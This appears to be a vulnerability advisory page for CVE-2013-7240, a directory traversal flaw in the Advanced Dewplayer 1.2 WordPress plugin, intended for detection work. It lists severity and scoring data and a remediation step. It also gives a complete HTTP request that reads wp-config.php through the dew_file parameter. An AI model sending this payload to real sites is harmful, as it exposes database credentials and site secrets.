🔙 목록으로 돌아가기

CVE-2013-7240: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal

TitleWordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of sensitive information.
RemediationUpdate to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used.
CVSS Score5
EPSS Score0.73626
CVE IDCVE-2013-7240
CWE IDCWE-22
Tags cve cve2013 wp-plugin lfi edb seclists wordpress westerndeal vuln

🔍 Vulnerability Description

A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.

🌐 HTTP Request

GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7240.yaml

🦈 Packet Capture: ⬇️ Download cve-2013-7240.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A